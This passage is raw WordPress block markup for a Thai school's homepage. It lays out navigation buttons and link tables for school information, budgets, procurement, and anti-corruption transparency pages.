06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\